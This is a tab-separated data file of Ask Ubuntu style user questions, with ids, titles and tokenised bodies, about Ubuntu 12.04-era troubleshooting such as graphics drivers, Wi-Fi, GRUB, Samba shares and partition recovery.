189433	which browser ( if any ) will be able to play video and audio at vkontakte ( vk.com ) in ubuntu without a flash plugin ?	i 'm primarily concerned about this question for ubuntu on toshiba ac100 ( arm ) , because a flash plugin for browsers is not available as a working package for ubuntu on ac100 , but it is a general question which would apply to any ubuntu system where one does n't want to use the prorietary flash plugin and the format . at http : //vk.com ( vkontakte -- a popular facebook clone from russia ) , video and audio are usually played by means of flash . what if one does n't want to mess with the proprietary adobe 's flash plugin , is it possible to play video and audio at vkontakte ? ( as we know , in the case of youtube , video playback can be done by means of html5 as an alternative to flash . and indeed , i could play video from youtube in firefox in ubuntu 12.04 for ac100 . ) is the situation for vkontakte worse than for youtube ? i have found the following answers about html5 and vkontakte ( in russian ) from 2010 -- http : //otvety.google.ru/otvety/thread ? tid=405ffaec80c737f7 and http : //habrahabr.ru/company/vkontakte/blog/93599/ -- saying that vkontakte encodes the video with h.264 , and because of this , html5 playback will work only in google chrome and safari ( important for ios ) , but not in firefox and opera which do n't support h.264 . i 've also found the following statemnent concerning h.264 support in browsers -- http : //en.wikipedia.org/wiki/h264 # controversies : '' in january 2011 , google announced that they were pulling support for h.264 from their chrome browser and supporting both theora and webm/vp8 to use only open formats . [ 16 ] however , as of september 2012 , google has not followed through with this announcement and still supports h.264 in their chrome browser through ffmpeg . no official statement was released on the matter . on 18 march 2012 mozilla announced that it will support h.264 in firefox on mobile devices due to prevalence of h.264-encoded video and the increased power-efficiency of using dedicated h.264 decoder hardware common on such devices . '' so , the situation is not clear : is chromium expected to abandon the support for h.264 , and has firefox not yet implemented it ? is it possible to play video at vkontakte in one of the browsers in ubuntu on ac100 now ? ( and what about audio at vkontakte ? ) ( i 've also posted this question to https : //answers.launchpad.net/ac100/+question/208747 . )
189438	how to recover from terminal custom setup	i installed ubuntu 12.04 and i added `` terminal '' to the launcher bar , the default size of the terminal is a bit small , after some googling here is how i made the disaster change : at hud menu , type `` preference '' and i see the option of edit > preference , this is as i expected after i clicked the option , i forget the exact steps , but somehow i came to some configuration panel and there is a checkbox for terminal `` custom '' and i checked it now an input box is enabled and i type gnome-terminal -- geometry 160x50 now the problem comes , whenever i click the terminal button at the launcher bar , new terminal windows pops up endlessly from everywhere , i can not do anything any more except logout or shutdown . the weird thing is , after i come back , i can not get that edit > preference any more when i type `` preference '' in hud , i tried `` edit '' , `` preference '' . to be clear , i still can use the computer as long as i do not click that terminal button , but i really want to use terminal to run commands . help is appreciated greatly ! update - ok , figured out . go to /home/jibin/.gconf/apps/gnome-terminal/profiles/default and open that xml file , i can see the options i changed at the gui , remove them and terminal runs good . the preference hud is back also , it is actually profile preference and it is only available when terminal is open . continue my ubuntu-ing ...
189440	listening radio with mplayer in terminal	i found out that listening to radio in terminal using `` mplayer url '' is much better than any software around , but after a while , terminal prints out a message saying low on cache . how can i increase the cache in the terminal ? is it possible to free the used cache periodically while listening to the radio ?
189441	install ubuntu on a new partition ?	i have install ubuntu with wubi , but it uses a virtual disk how can i make it so ubuntu uses a new partition instead of the virtual disk on my c : drive ? i have been googling for a few hours now , and i ca n't seem to find the solution i am looking for .
189445	how do i check if my laptop fan is working properly ?	i have an old dell studio 1558 laptop ( 2 years ) with ubuntu 12.04 . its always make some noise , some time the fan make a terrible noise - and i must quickly shutdown it by press the power button 5 seconds . when the terrible noise the laptop take really long to shutdown with the normal way ( or event terminal with shutdown -h now ) . i just install new windows 8 for testing , with windows 8 there is no noise with the fan . but i can make sure because i just use windows for a few minute . so is there any way ( some command or program ) that i can check if my fan is working properly ? does the fan need driver or something ? thanks for all of you !
189453	how can i install a nightly build ?	i would like to install the nightly build of cinnamon desktop . currently i am using the stable version ( 1.4 as of 16.9.2012 ) . i added the ppa for nightly build . do i need to remove the stable cinnamon first or can i just do apt-get install cinnamon ?
189454	upgrade linux kernel 3.5.4 manually	ok , so i 'm not new to linux , but by no means am i a guru , and its time for me to upgrade my linux kernel to 3.5.4 ( i need new drivers only compatible with the newest kernel image ) , and i would like to do so manually . what i mean is that i would like to download the official .tar.bz2 image from here , then extract the image , but after that how do i actually install the kernel image ?
189461	wireless network says no firmware and so i ca n't connect to the internet	i am running 12.04 lts alongside windows 7 . when i boot into ubuntu , it says that there is no firmware for a wireless network , and it shows `` no wireless network '' and i ca n't connect to the internet . when i boot into windows , it works fine . how can i get it to work because i obviously need to be able to connect to the internet for ubuntu to be useful ?
189466	what is the default password for ubuntu 12.04 ?	i 've just had someone install ubuntu 12.04 . i am not a techie - just a user . i am now asked for a password which i do not have and has never been set . is there a default one ? otherwise i have to work as a guest all the time ... not so great . i appreciate any help .
189469	how to send custom notifications in kde ?	as we all know that ubuntu release its event updates with notifications and of course kubuntu also does the same job but with different style . but is there any way to get kubuntu notifications in ubuntu . edit : ok here knotify4 will do the job but how can i send custom notification alerts from that ?
189475	firefox menu is missing	i have just installed ubuntu 12 and started up firefox so i could configure it . but there does n't seem to be any way to access preferences . no menu bar appears at the top . right-clicking ( in multiple places ) does n't seem to work either , no option to open the preferences window is available . nothing seems to work . all i can do is change my home page by dragging the url onto the home button . help !
189483	trouble getting cooking lens to work	i 'm running ubuntu 12.04 and decided to try out the cooking lens posted on this question however rather than being able to get the search working all i seem to get is this empty lens ( using cookies as an example ) : where clearly the lens is n't working . my questions : does anyone else have the same issue ? if not : does anyone have a solution/idea of something i should try out to fix this ? the lens starts empty even without typing anything in so i 'd guess there 's an issue somewhere other than there not being any recipes for what i search for . i 've added scope packer 's ppa and i used the link provided in the original post and i 've made sure that it is n't my internet connection either .
189487	how do i configure background transparency for kde 's terminal ?	i got installed kde-plasma desktop but i did n't figured out how to set transparency for kde terminal . i know about gnome terminal that , it will be at preference but i did n't get it here in kde for the terminal . thank you .
189489	new monitor has 1920x1080 but only show 1366x768	i just got a new 32 '' monitor with 1920x1080 ( viore ) but my ubuntu is only showing resolutions up to 1366x768 even thought the laptop ( ultrabook ) itself ( samsung ) has 1600x900 on it 's own monitor . i turned off the samsung screen so as to just have the external screen but that did n't help
189492	why is `df -h` not showing the whole disk space ?	i recently formatted my hdd to increase the partition size for ubuntu . despite the actual 170 gb free space ( sda5 ) , ubuntu shows only 27 gb when prompted via properties . here is my df-h output : alper @ ubuntu : ~ $ df -h filesystem size used avail use % mounted on /dev/loop0 29g 3.1g 26g 11 % / udev 956m 4.0k 956m 1 % /dev tmpfs 386m 884k 385m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 965m 80k 965m 1 % /run/shm /dev/sda5 173g 5.0g 169g 3 % /host /dev/sdb1 932g 439g 493g 48 % /media/alper /dev/sda4 173g 66g 107g 39 % /media/storage /dev/sda2 120g 85g 36g 71 % /media/windows 7 gparted also shows the correct space values , but when i right click on home or file system , it shows 27 gb and does not let me copy necessary files ( about 100 gb total ) . i tried previous `` missing disk space '' solutions around here but could n't fix the problem . hope someone can help . thanks in advance
189494	failed to enable msi-x	i tried to make a copy of my kernel so i can use the copy of the .config to mess around with it so i can learn it better . i followed the guide here - http : //mitchtech.net/compile-linux-kernel-on-ubuntu-12-04-lts-detailed/ however , now when i boot into the kernel , it says `` xhci_hcd 0000:03:00.0 : failed to enable msi-x '' . everything appears to work fine , but i do n't know what to do to fix that error . also , i tried to boot into the old kernel ... and it gives me the error too . i thought i was making a copy of it , but apparently i changed it ? a friend told me that i should have used the debian method on that guide and that the way i did it gave me an `` unpackaged kernel '' ( i do n't fully understand what that means ) . is this true ? and if so , how can i fix it ? thanks for any help .
189496	how to restore a partition that has been accidentally converted to a swap area	i was trying to install ubuntu manually from my external hard drive ( which has ubuntu installed in it ) to my internal hard drive.i created the swap area using mkswap command in a wrong partition ( my windows partition ) . the partition is not formatted but converted into a swap area.because of this i can not boot into my windows.is there any way that restore the partition back to its normal state ? i found this while doing some research.but i guess that works only when the drive is formatted and when one has to recover the lost data . thank you .
189500	`` unable to mount location . failed to mount windows share '' error when trying to share folders	i have two ubuntu machines both on 11.10 i want to share folders from one to the other . if , on the server machine , ( in nautilus ) i right click on the folders and click properties > share > share this folder > create share . then on the client i 'm prompted for a username and password . my username and password does not work . if i select `` guest access '' check box then i get `` unable to mount location . failed to mount windows share '' this should be straightforward , right ?
189510	how to transfer podcasts from one computer to another ?	i have 6 gb worth podcasts on my old computer and i wish to transfer to to my new computer ? i know where my podcasts files are stored . how do i copy it to my new computer such that the old podcasts are read and keep adding episodes later ? all of this on banshee media player . thanks in advance .
189511	what is the status of amd 's open source 7000 series drivers ?	i 've seen announcements that amd released open source drivers for the 7000 series of gpus earlier this year , but not much since then . are they in the kernel or are there plans to integrate them ? if so , will 12.04 ever get them , and will it just be a matter of switching from the proprietary drivers to the open source drivers ?
189514	how to use a bootable usb on another machine without grub ?	i have installed ( not live cd ) ubuntu on a usb stick , and now having dual boot with windows . how can i use this usb on another machine , as the latter does not have grub . how to make the usb standalone bootable without grub , working on any machine ?
189515	my account ca n't start gui , but guest account can	trying to get the nvidia drivers to output 720p component ( as they did in my 10.10 system ) , i 've hosed my mythbuntu 12.04 config in some way . the current status is this : when i boot the pc i get to this login window : if i enter my password and select fred hamilton , i get the following on-screen text , then it returns to the above log-in screen : if i select guest account , it launches fine ( into ubuntu , ubuntu 2d , xfce , or mythbuntu ) why ca n't fred hamilton launch the gui ? i also noticed that when i launch as fh , an xorg.0.log file is generated ( it 's too long for askubuntu 's 30k limit so it 's not here , but i did n't see anything obviously wrong in it ) . when i launch as guest , no log file is generated at all ...
189518	unable to detect second display via hdmi with nvidia x server settings ?	under bumblebee i was able to run nvidia-settings . i have two dell monitors which on win7 i am able to use by using one via vga and the other via hdmi . in ubuntu , i can only use one with vga as nothing happens when i plug in the other one via hdmi even doing detect displays in nvidia-settings . how can i get it to be detected ? here are some screenshots of my nvidia-settings : thanks
189522	why alt+f2 r didnt work on gnome shell classic	im using gnome shell classic on ubuntu 12.04 . however , i notice that tht ( alt + f2 + r ) didnt work . how do i get this effect on gnome shell classic ? i just want to restart shell without logging out . thanks in advance .
189526	why does n't indicator-cpufreq show up in panel ?	i 'm using 12.04 and i want to add `` indicator-cpufreq '' to my panel . it 's installed and i try to launch it manually through alt+f2 . it just does n't show up . does anyone know why ?
189529	can i upload binary packages to a launchpad ppa ?	well , i have a launchpad account and a just set up a ppa . since i do n't have generated source packages , i 'd like to upload my binary packages to the ppa . though it seems not possible ... is there a way to avoid create source packages ?
189531	how can i find files from other partition running ubuntu ?	i have two hard drives , one where windows 7 ( c ) is installed and the other ubuntu 12.04 ( d ) . i ca n't find the other files on d ( like movies ) using ubuntu . but i do find them running windows . how can i find the files running ubuntu without having to copy them over to c ?
189532	installing microsoft office 2010 on wine 1.4	microsoft office 2010 professional plus will not install because of windows codecs . i need help on installing dotnet20 , msxml6 and corefonts using winetricks . it says it can not validate or find the checksum . please help me . i got this from this article .
189534	how do i get my right- and middle-click back ?	i just upgraded from 10.04 to 12.04.1 on my macbook 7,1 and the first thing i noticed was that i could n't right-click by clicking on the clickpad with two fingers , or middle-click by clicking with three , as i had been . according to everywhere , there 's now `` better clickpad support '' but the only thing i see is that things have stopped working . how can i get things back to the way they were ? note that i do not want to right-click by clicking on the bottom-right area of the clickpad .
189540	how to re-configure graphics from intel integrated to intel / ati switchable ?	minimum goal : ability to switch between the graphic cards without drivers re-installation . restarting computer in the process is fine . there are lots of 'how to get switchable graphics to work ' guides but i found none on how to configure a system for switchable graphics operation on ubuntu from the ground up , nor explaining the current driver situation for particular computer models ( integrated+discrete combinations ) . examples : https : //help.ubuntu.com/community/hybridgraphics http : //www.thinkwiki.org/wiki/switchable_graphics my system being mature and on intel integrated card also makes things complicated . system information : ubuntu 12.04 amd64 , installed clean with system configured to use only the integrated intel card lenovo thinkpad t500 intel gma 4500mhd / ati mobility radeon hd 3650 current situation : mature and up-to-date system with no configuration changes to what 's given above . i 've made a backup image of the system ( clonezilla ) so regardless of what 's written below let 's assume it 's our starting point . if something in what i have already tried is not clear you may as well diregard it . what i have already tried : configuring bios to switchable graphics and : installing additional hardware drivers - returned an error . installing proprietary amd-driver-installer-12.6-legacy-x86.x86_64.run automatically - system starts to 'low-graphics mode ' . tried fixing as per https : //help.ubuntu.com/community/binarydriverhowto/ati # manually_installing_catalyst_12.6.2c_special_case_for_intel.2bac8-ati_hybrid_graphics got lost , gave up . bios settings : please note that while configuring bios for integrated graphics only is pretty straightforward , configuring for switchable graphics is not . despite that if you know the driver installation part well , i 'm willing to test all the bios settings combinations on my own .
189547	what does endofmenu do ?	i have been given an example program , i am wondering what exactly the < < endofmenu and endofmenu does , wo n't it work the same if you leave it out and just use the while loop ? # ! /bin/sh echo `` menu test program ... '' ; stop=0 ; while test $ stop -eq 0 ; do cat < < endofmenu 1 : print the date 2,3 : print the current working directory 4 : exit endofmenu echo ; echo -e `` your choice ? \c '' read reply echo case $ reply in `` 1 '' ) date ; ; `` 2 '' | '' 3 '' ) pwd ; ; `` 4 '' ) stop=1 ; ; * ) echo illegal choice esac done
189548	wifi ca n't connect after suspend	i 've had this problem since ubuntu 11.10 ( my first install ) but i was able to get around this issue with this answer . after i installed ubuntu 12.04.1 i tried to use the same fix as before but i could n't get it to work . i 've also tried a couple other different fixes i found around the web but they did n't work . basically here 's what happens : i can see all the networks in my area . when i try to connect to one of them it never connects , it keeps disconnecting . after a little bit it asks for the password again but its already filled in correctly . if i hit okay it will do the exact same thing again . so does anyone know how i can get this fixed ? info : computer : hp pavilion dv6t-6b00 cto quad edition entertainment notebook pc network card : intel速 centrino速 wireless-n 1000 os : ubuntu 12.04.1 ( x64 ) dual booting with windows 7 ( x64 ) ( *not using wubi* ) wireless card driver : iwlwifi update : i was about to reinstall but discovered the same issue happens on ubuntu 's live disc . i still was unable to fix it as before . i also tried the xubuntu 's live disc , and the same . re installing the driver has n't worked either . update : i just tried out opensuse and i 'm having the same problem on that too . so it must be the kernel or one of it 's drivers . i 've done : sudo rmmod xxxxxx sudo modprobe xxxxxx with iwlwifi and the other modules it uses ( cfg80211 and mac80211 ) when my network was n't working and it did n't do anything . i 've made a bug report but i do n't know if i 'm gon na get a response ( feels familiar ) . for now though i guess i 'm forced to stick with windows and dream about linux : ( . i 'll keep looking for a way to fix it however .
189551	amd radeon hd 7750 hw acceleration ?	is it possible to get ati catalyst drivers and hardware acceleration working for a amd radeon hd 7750 in ubuntu ?
189557	ubuntu 12.04 intermittently fails to wake up from sleep	when i put my ubuntu 12.04 machine into sleep , sometimes on waking up , it fails , logs me out , and takes me back to login screen . when i log back in , it tells me some unexpected error happened , but it fails to let me report the bug . this has started to happen recently , but i do n't know what triggered it . uname -a linux [ name ] 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux the issue seems similar to xorg intermittently restarts after suspend . but in my case i am not sure if it is a xorg issue . i looked at xorg logs , but did n't notice anything indicating an error . i know i am not providing a lot of info , but i am not sure where ( e.g . which log files ) i should seek for more info .
189558	why is ubuntu 12.04 taking very long to start and run programs ?	i have a toshiba laptop with 2.8 gb of ram , 1.87x2 ghz processor , and ubuntu 12.04 64 bit on it as a partition installed with wubi . it takes 5-10 mins to start up , and opening any program ( such as chromium , chrome , skype , firefox , thundermail , etc ) takes over half a minute . i stopped using unity because my graphic card could n't handle it and swapped over to cinnamon . it 's a little better , but everything is still really really slow . any suggestions/solutions ?
189562	alternative to compizconfig for changing windows move key	i 'm looking for an alternative for changing windows move key ( as seen here : how to disable window move with alt + left mouse button ? ) . this seems to be possible directly on ubuntu 11.04 . i really do n't want to install compizconfig just for one single thing ...
189565	vidalia exited abnormally . exit code : 139	i downloaded tor browser bundle for 64-bit linux . whenever i start to run it on my ubuntu 12.04 os it gives me the above error . please help .
189566	input signal out of range ; change settings to 1600 x 900	i recently installed ubuntu 12.04 onto my hp pavilion , in an attempt to make the desktop able to dual-boot windows 7 and ubuntu . i managed to get down to the last step , and finished the installation process . after it prompted me to remove what i used to install ubuntu , i did so , removing my sandisk 8gb flash drive , and allowed the system to reboot . like usual , the desktop booted with the hp image , with the options at the bottom ( boot menu , system recovery , etc ) . however , when it should have started up with ubuntu ( like i 'm certain it should have done ) , i received the following error : input signal out of range change settings to 1600 x 900 from the time i installed the operating system , back in late august , till now , i 've been trying to figure out how i would go about fixing this issue . my mom is also starting to get frustrated with my not having resolved the issue , as its the only desktop that has a printer installed . is there any possible way to resolve this ? to summarize the problem : -successful boot -screen brings up error -screen goes to standby -nothing else possible until desktop is rebooted , which will initiate the above three steps a few notes : -i did not back up my computer before i installed ubuntu . i did n't have anything to write to , and basically just forgot to . -i do n't have a recovery disk . -i do n't have the windows 7 disk that is supposed to come with the computer . -it has been narrowed down by a friend on skype that the problem lies with the display , and that the vga= boot command does have something to do with fixing the problem thank you in advance for resolving this problem . i greatly appreciate it .
189567	how to fix a `` /usr/lib/libstdc++.so.6 : version `glibcxx_3.4.15 ' not found '' error ?	i 've been getting this annoying problem . i want to compile a .so under ubuntu using the anjuta ide . it compiles fine and all , but when i load it , that 's when the error comes up : /usr/lib/libstdc++.so.6 : version `glibcxx_3.4.15 ' not found i 've tried everything in glibcxx_3.4.15 not found . but nothing seemed to work .
189570	how do i use a sudo command line to copy a folder into the system files ?	specifically , my `` themes '' folder has been corrupted ( my fault ) , and i need to replace the entire folder with a backup that i made . i will add a finalized answer once i can .
189574	can i give an app that i purchased in the software center to somebody else ? ( and related questions . )	i have purchased a lot of content in the ubuntu software center ( apps and magazines ) and i also have purchased music in the ubuntu one music store . i have a few related questions about the transmission of this content to another person . do i have the legal right to transmit this content to other people ? to my family ? to my heirs ? to my close friends ? to remote acquaintances ? when i do transmit such content , should i delete it from my own devices ? or can i copy it ? do i have the right to sell it over ? if i indeed have the right to transmit content , how should i do it ? for instance , should i transmit my single sign on email address and password ? if some of those questions should be asked separately , please tell me in the comments and i will post them as new questions .
189579	problems reading a 4gb sdhc but i can read a 8gb sdhc	i recently bought a dell xps l502x . the internal card reader had some trouble detecting cards but i was able to fix it using the workaround explained at https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/995743 now i can read my 8gb sdhc card class 10 , but i am unable to detect a 4gb sdhc class 4 i know that the sd is ok , because i can read it from my digital camera , and other computers too . i post here , because i am interested in solve the problem using ubuntu , but i have the same issue with the same memory on windows too . ( i have dual boot ) does anyone have any idea ? thanks .
189580	how can i stop the grub config from being changed during a clean ubuntu install to another partition	every time i install ubuntu to another partition on my computer my grub settings are changed . eg getting the frequency out of range error and having to uncomment grub_gfxmode=640x480 every install . does the importing accounts option on installation also import the current grub settings from the last os ? how can i stop the grub configuration being changed when doing a clean install on another hard drive partition .
189581	trying to run rubymine but getting error no jdk found	getting the following : error : can not start rubymine . no jdk found . how can i fix this so that rubymine starts ?
189585	is it possible to run ubuntu on a nexus 7 ?	is it possible to run ubuntu 12.04 or 12.10 on a google nexus tablet ? would it be able to run unity and/or gnome shell ? or would it have to run a lighter desktop environment ?
189589	cant connect to internet directly on ubuntu	i have dual booted machine windows 7 with ubuntu 12.04 . i dont have direct internet access in ubuntu on wired network although direct connection works in windows7 . i have to connect through a proxy on ubuntu , which works fine . this is not a ubuntu version related problem as i have been getting it from ubuntu 11.04 . i want to know what difference is there in ubuntu and windows 7 which creates such results and how to fix it ? edit in ubuntu i get the error on direct connection ( google-chrome-stable ) - the server at www.example.com ca n't be found , because the dns lookup failed .
189591	connecting android 4 ( ice cream sandwich / jelly bean / kitkat ) phone	i 'm using the us model 16gb version of the samsung galaxy s3 ( i747 ) , however , i can not mount it to my laptop from some reason . i have tried using both ftp and mtp connections , but neither work . what should i do ?
189592	generate a proper 404 page for blocked sites via /etc/hosts instead of redirect to localhost	i have blocked some websites by editing /etc/hosts and adding several newline-entries in the following manner : 0.0.0.0 www.domain.com and it works . the only thing is : when a website is visited which is blocked , the browser is redirected to my http : //localhost , resulting in a directory listing or website-presentation that is running within my localhost root-environment . it 's not a very big problem , but i prefer a standard error that mentions the website can not be visited ( for instance by a 404 page ) . is this possible ?
189593	how about a separate partition for home ?	using 12.04 . i heard but never tried with /home as a separate partition . what my question is just assume that i have already /home and i 'm trying to have a fresh install . so at the installation process what steps i 've to take . because my doubts are here : are we have to select /home also in installation ? or will it do automatically ? what about all the configuration files in home ? will they load automatically or we have to manually ? if so how ?
189594	how to backup specific application ?	using 12.04. is it possible to have backup of particular application ? i mean i do n't want all applications and i just want one single application as a backup along with its configurations or settings what i made . so from what areas i 've to collect the backup ?
189610	how to partition this usb drive for installation with an easy walk through ?	i am not a computer literate and need to know how to partition my usb drive without messing up my laptop . i already have the boot order set up properly and the usb drive already has the iso image downloaded onto it . i am ready for install but just do not know how to partition . i am installing ubuntu 12.04 lts onto a usb . can someone help me ? i need an easy walk through please . what i need to know is from the screen shots above do i use the swap drive and if so how do i partition that drive to be my drive ? i am stuck up to this part on the installation process . yes please make a list of the steps for me .
189617	how to un-install the mac osx lion theme	i have had the mac osx lion theme theme installed for a month or two now , and am ready to either try a new theme , or go back to the default unity theme . how can i completely remove this theme ?
189622	should i install 12.04 or 10.10 on a laptop with 512mb of ram ?	i would like to like to install ubuntu on my old hcl laptop . its hardware specifications are as follows : processor : intel dual core t2080 ram : 512mb ddr2 hdd : 80gb gpu : ati radeon xpress series i 've been running windows xp sp3 here for quite a while and recently it has become really slow . heck , i ca n't even use firefox 15 without the occasional 5 min lag . my question is should i install ubuntu 12.04 lts or 10.04.4 lts ( deskop version ) on this laptop ? what i intend to use the laptop for : ( after installing ubuntu ) 24*7 online seedbox ocassional web surfing basic file server thank you for reading this question . kindly defend your answer . edit : best solution imo : i 've installed ubuntu server 12.04 . it servers all needs : transmission mount external hdds on boot - your very own nas samba file server to access files from any of your devices
189623	unable create a custom keyboard shortcut in 12.04	i 'm using 12.04 64bit on a dell latitude e6410 . i want to create a custom keyboard shortcut . now i found out some articles that says you can create a custom keyboard shortcut using the super key . but i ca n't create any custom shortcut . the status is showing as `` disabled '' . ideally it should show `` accelerated '' and then wait for my keyboard combination .
189624	ubuntu 12.04 does n't start or install	i have an hp g4-1387 which has two graphics cards , an ati 7450m and intel hd3000 . i tried to install ubuntu and run it from my usb stick , i get the usual black , console like screen showing a lot of things in an small resolution , then the screen adjust the resolution and then it is suppose to start ubuntu or installation but instead i get a black screen forever . i think is related to a graphics card driver problem . any idea how to solve it ? thank you
189627	ca n't run 1080p with radeon 6870 on ubuntu 12.04	i have a xfx radeon hd 6870 and a 1080p monitor that works fine in windows , but in ubuntu 12.04 with the ati/amd proprietary fglrx driver ( post-release updates ) installed i ca n't select 1920x1080 as my resolution . the same occurs with the open source drivers . any help would be appreciated !
189628	why are some online forms unable to submit ?	i 've been having a lot of problems regarding networking on my ubuntu laptop . from windows , everything works fine . when i wire directly into the modem , it works fine , but when i am on my wireless network ( and i 've tried wiring into the network as well ) , i 've been having problems with web form , and sometimes site logins . not all web forms have this problem , but on many , i submit the form , and nothing happens for a minute or two . then , in firefox , it says the connection was reset . in chrome , it says `` this web page is not available . the connection to was interrupted . this was all i knew until i got another clue when i refreshed one of the error pages . it said `` can not upload file - too large for php post_max_size directive '' . i only wrote a sentence ! any idea why it does that ?
189640	how to find architecture of my pc and ubuntu ?	when running uname -a , i get as output 41-ubuntu smp mon aug 13 17:59:54 utc 2012 i686 athlon i386 gnu/linux can someone please explain to me why both i386 & i686 ? what exactly is my pc architecture and what version of ubuntu am i using ( 32bit or 64bit ) ?
189642	how to recover disk and files after 10.04 boot failure ?	i have a 1tb hdd with four windows xp partitions and a 120gb hdd with 10.04 . while working in ubuntu , due to delay and failure to shutdown , i switched off the system . next it failed to boot in ubuntu and stopped at initramfs . after that , i tried to repair from the booting stage . by mistake instead of hdd no i used partition no . this damaged the windows also . then windows xp was reloaded and is running . when i boot with 12.04 , it is able to detect the 120gb hdd , but , it is unable to mount . i am unable to access the files . i would like to revive the disk and recover files . would appreciate any help .
189645	alternatives for 'egrep -o `` success|error|fail '' < filename > | sort | uniq -c '	i sometime need to check some logs and i do this with this command : egrep -o `` success|error|fail '' < filename > | sort | uniq -c sample input : test error on line 10 test connect success test insert success test started at 00:00 test delete fail sample output : 1 error 1 fail 2 success i would like to know if someone knows a way to do this with a shorter command ? before you ask why i would like to do this with an different command ... no special reason , i 'm just curious : )
189647	suspend button only shows screensaver , not suspending	running ubuntu 12.04 with xfce desktop . when i do a suspend my monitor fades to black , prints some information to a console , and then shows the screensaver . it does not suspend . this happens when i choose suspend from my panel widget , or when i run `` xfce4-session-logout -- suspend '' what are the next steps to diagnose this ? any ideas what might be broken ?
189650	how to uninstall windows xp using ubuntu 12.04 if they are in same partition ?	so i have installed ubuntu 12.04.1 using windows installer and they are both installed in same location . can anyone help me how to delete windows without harming linux ? gparted and disk utility does n't work .
189651	i 'm having problems with ubuntu	yesterday i tried to install ubuntu . i burned ubuntu 10.04 desktop on a cd , and it was really slow when i tried to boot from the cd . so , i tried to install it from a usb-flash . i used universal usb installer and set it to my e : / hard disk . now , i ca n't load any system . windows ca n't load i do n't know why and ubuntu ca n't to be installed . because when i tried to install it to the hard drive , this message appears : no root file system is defined please correct this from the partitioning menu.. what i must to do to recover windows ?
189654	windows 7 wo n't let me connect to my ubuntu samba share	i set up samba on my 12.04 ubuntu install . i shared a folder from my home directory . when i go to my windows 7 box , i can see the ubuntu box on the network , but when i try to connect , i get a `` windows security '' prompt to enter my network password , but entering my password does n't work .
189657	when will xfce 4.10 available in official ubuntu repositories ?	i was wondering why , after about 4 months from the release of xfce 4.10 , it is still not available in official ubuntu repositories and when it will be available ? i do not want to install it from ppa .
189661	how to mount a hidden ntfs winre which are on an external hdd	a friend have given me her external hard drive which contains a backup of his windows data . the disk has two ntfs partitions , once of them tagged as winre . when i do fdisk -lu i get disk /dev/sdc : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x59725972 dispositiu arrenc . inici final blocs id sistema /dev/sdc1 2048 3074047 1536000 27 hidden ntfs winre /dev/sdc2 * 3074048 234438655 115682304 7 hpfs/ntfs/exfat i never fought against this type of partitions and i have n't any idea of how to mount this and recover the data . can someone help me ?
189663	is it possible to add apps to the notification bar ?	how to add apps to the notification bar in ubuntu 12.04 ?
189669	if i install ubuntu 12.04 , will it recognize all of my ram ?	i have a question that 's been bugging me since a long time . a friend of mine told me that when he had ubuntu 11.10 installed the os only recognized 3.4gb instead of 8gb . in the next week i 'll be buying a new computer and i 'll have 8gb of ram , does the video card need to have it 's own video memory for the os to recognize the ram entirely ? . if you could give me some advise on how to configure my pc before i buy it it would be great . thanks . tengo una duda que me ronda de hace tiempo . un amigo mio me comento que con ubuntu 11.10 tenia 8 gb de ram y que solo le reconocia 3.4 . dentro de unos 5 dias me comprare un ordenador nuevo a base de componentes y voy a meterle 8 gb de ram . âżhace falta que la tarjeta grăąfica tenga gb dedicados para que el sistema me reconozca la ram entera ? si podeis darme algunos consejillos sobre como configurar el pc antes de comprarmelo para que ese problema no me pase , muchisimas gracias .
189672	failing to upgrade to linux-image-3.0.0-26-generic	when i try to upgrade linux-image-3.0.0-26-generic i get following problems : dpkg-deb ( subprocess ) : data : internal bzip2 read error : 'data_error' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/linux-image-3.0.0-26-generic_3.0.0-26.42_amd64.deb ( -- unpack ) : short read on buffer copy for backend dpkg-deb during `./lib/modules/3.0.0-26-generic/kernel/drivers/scsi/fnic/fnic.ko' no apport report written because maxreports is reached already examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.0.0-26-generic /boot/vmlinuz-3.0.0-26-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.0.0-26-generic /boot/vmlinuz-3.0.0-26-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.0.0-26-generic_3.0.0-26.42_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.0.0-26-generic ; however : package linux-image-3.0.0-26-generic is not installed . i do n't know why this happens to me ; earlier upgrades always worked without problems . does anybody know how to fix this ?
189677	how to turn off screen ( dpms ) together with locking session in kde ?	first of all , i 'm aware a similar question for gnome is asked here : `` switch off laptop backlight when locking screen '' . objective i would like to turn off my screen on locking the session for power saving reasons . actual problem locking the screen on kubuntu ( kde ) inevitably triggers the screensaver as far as i can see . there 's no screensaver option other than 'blank screen ' together with its background colour set to black that comes just close to my goal . it blanks the screen , but does n't turn off the screen . screen 's backlight will still be on and not saving any power . current workaround a workaround via a script + shortcut key is possible , however , it 's just a workaround since it does n't trigger on all ways to lock the session . therefore , i think it should be possible to have it done more elegantly , for example by providing this option in kde 's configuration dialog of the screensaver . the workaround i am now using is the following . a script that locks the screen and turns off the screen : # ! /bin/bash qdbus org.freedesktop.screensaver /screensaver lock xset dpms force standby and let it run with a shortcut key via a custom menu entry . it works . here 's why i consider it to be a workaround rather than a solution . it does n't work for other ways to trigger the locking of the session . my actual question ( s ) do i need to touching/patching kde 's source ? if not what are my options ? if so , could someone point me to where i can get started ? what do you think is the recommended place in the gui for configuration ? i 'm using kubuntu 12.04 and willing to upgrade to kde 4.9 or waiting for the 12.10 release .
189688	how to change video settings in ubuntu 12.04	i have a ati radeon x600 card ( rv348 ) and samsung syncmaster 550v i install ubuntu 12.04 with a plasma monitor i canâ´t see the desktop i ca n't see the grub options ; i would like to change the video configuration but xorg.conf do n't exist
